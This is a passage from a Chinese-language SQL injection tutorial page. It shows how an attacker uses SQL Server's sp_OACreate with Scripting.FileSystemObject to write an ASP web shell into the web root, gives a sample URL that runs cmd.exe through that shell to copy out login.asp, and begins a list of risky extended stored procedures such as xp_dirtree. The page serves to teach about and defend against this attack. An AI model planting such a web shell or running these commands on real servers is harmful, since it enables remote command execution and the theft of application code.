当然,骇客也可以利用 Scripting.FileSystemObject 对象来建立一个 ASP 网页后门,语法如程序代码列表 4 所示:
DECLARE @fs int,@fi intEXEC SP_OACREATE ''''Scripting.FileSystemObject'''',@fs OUTPUTEXEC SP_OAMETHOD @fs,''''CreateTextFile'''',@fs OUTPUT,''''C:\InetPub\WWWRoot\SQLInject\Shell.asp'''',1EXEC SP_OAMETHOD @fs,''''WriteLine'''',null,''''<% Set objShell=Server.CreateObject("WScript.Shell") : objShell.Run Request("cmd") %>''''
程序代码列表 4:建立 ASP 后门网页。
从此透过 URL 就可以执行任何执行文件,范例如下:
http://localhost/sqlinject/shell.asp?cmd=C:\WINNT\system32\cmd.exe /c type c:\inetpub\wwwroot\sqlinject\login.asp > c:\inetpub\wwwroot\sqlinject\test.txt
其它相关的延伸预存程序
这一类的延伸预存程序,你可能要小心的还有:
延伸预存程序的名称
用途
使用范例
xp_availablemedia
显示系统上可用的磁盘驱动器,如 C:\。
xp_dirtree
显示某个目录下的子目录与档案架构。
xp_dirtree ''''c:\inetpub\wwwroot\''''
<< 上一页 [11] [12] [13] [14] [15] [16] [17] 下一页
Copyright @ 2007-2012 敏韬网(敏而好学,文韬武略--MinTao.Net)(学习笔记) Inc All Rights Reserved. 闵涛 E_mail:admin@mintao.net(欢迎提供学习资源)
鄂公网安备 42011102001154号
站长:MinTao ICP备案号:鄂ICP备11006601号-18